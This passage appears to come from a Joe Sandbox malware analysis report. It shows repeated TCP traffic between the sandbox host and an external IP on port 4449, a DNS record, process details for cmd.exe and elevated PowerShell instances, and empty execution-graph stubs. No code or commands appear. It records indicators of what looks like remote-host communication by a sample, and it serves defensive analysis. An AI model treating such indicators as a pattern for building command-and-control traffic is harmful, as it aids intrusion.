Apr 20, 2024 10:20:37.617552042 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:37.619271994 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:37.861643076 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:37.861788988 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:38.112013102 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:42.494888067 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:42.736486912 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:42.736553907 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:42.936418056 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:42.978940964 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:43.177968979 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:43.181123018 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:43.424295902 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:43.427709103 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:43.674841881 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:54.916750908 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:55.158238888 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:55.158302069 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:55.358663082 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:55.400842905 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:55.599873066 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:55.602018118 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:55.845987082 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:20:55.849839926 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:20:56.095791101 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:00.354365110 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:00.595860004 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:00.595995903 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:00.802254915 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:00.854063988 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:01.052922964 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:01.054197073 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:01.299246073 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:01.302352905 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:01.548773050 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:07.010512114 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:07.252757072 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:07.258472919 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:07.459393024 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:07.511667013 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:07.710414886 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:07.717989922 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:07.970920086 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:07.978080988 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:08.220859051 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:09.448154926 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:09.689824104 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:09.695761919 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:09.899827003 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:09.947767019 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:10.146950006 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:10.149661064 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:10.392666101 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:10.392734051 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:10.642771006 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:12.166685104 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:12.408283949 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:12.408355951 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:12.608431101 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:12.650832891 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:12.849685907 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:12.851211071 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:13.096019030 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:13.096120119 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:13.345940113 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:24.573182106 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:24.814428091 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:24.814486980 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:25.014925957 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:25.063379049 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:25.262423992 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:25.267167091 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:25.517707109 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:25.517831087 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:25.768084049 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:39.295656919 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:39.549101114 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:39.551664114 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:39.752304077 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:39.807081938 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:40.006201982 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:40.008907080 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:40.252151012 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:40.259730101 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:40.501919985 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:42.791719913 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:43.033513069 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:43.033597946 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:43.237871885 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:43.364079952 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:43.563338041 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:43.565804005 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:43.814551115 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:43.814604998 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:44.064618111 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:44.667649031 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:44.908497095 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:44.908673048 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:45.119687080 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:45.260229111 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:45.459321976 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:45.461055994 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:45.705168962 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:45.705225945 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:45.955584049 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:50.291949987 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:50.533210993 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:50.535696030 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:50.738360882 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:50.963608027 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:51.162642002 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:51.169663906 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:51.430984974 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:51.431044102 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:51.674175978 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:55.604240894 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:55.846261024 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:55.846338034 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:56.047058105 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:56.088323116 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:56.287678957 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:56.289288044 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:56.533498049 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:56.533951998 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:56.740469933 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:56.794245958 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:56.993604898 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:56.995490074 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:57.236463070 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:21:57.237963915 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:21:57.486335039 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:22:01.604167938 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:22:01.845654011 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:22:01.845727921 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:22:02.045949936 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:22:02.113437891 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:22:02.312366009 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:22:02.312957048 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:22:02.564448118 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:22:02.564522028 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:22:02.814445972 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:22:16.323276997 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:22:16.564642906 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:22:16.564846039 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:22:16.765058041 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:22:16.807192087 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:22:17.006484985 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:22:17.007227898 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:22:17.253151894 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Apr 20, 2024 10:22:17.253221035 CEST | 49730 | 4449 | 192.168.2.4 | 193.222.96.114 |
Apr 20, 2024 10:22:17.502073050 CEST | 4449 | 49730 | 193.222.96.114 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Apr 20, 2024 10:18:16.279107094 CEST | 1.1.1.1 | 192.168.2.4 | 0x5f89 | No error (0) | 199.232.210.172 | A (IP address) | IN (0x0001) | false | ||
Apr 20, 2024 10:18:16.279107094 CEST | 1.1.1.1 | 192.168.2.4 | 0x5f89 | No error (0) | 199.232.214.172 | A (IP address) | IN (0x0001) | false |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 10:17:54 |
Start date: | 20/04/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff78a520000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 10:17:54 |
Start date: | 20/04/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 10:17:54 |
Start date: | 20/04/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff78a520000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 3 |
Start time: | 10:17:54 |
Start date: | 20/04/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 4 |
Start time: | 10:17:54 |
Start date: | 20/04/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff78a520000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 10:17:54 |
Start date: | 20/04/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 10:17:57 |
Start date: | 20/04/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Execution Graph
Execution Coverage: | 1.7% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 0% |
Total number of Nodes: | 8 |
Total number of Limit Nodes: | 1 |
Graph
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD9B9715BD Relevance: .6, Instructions: 637COMMON
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00007FFD9B8A0E32 Relevance: .3, Instructions: 292COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |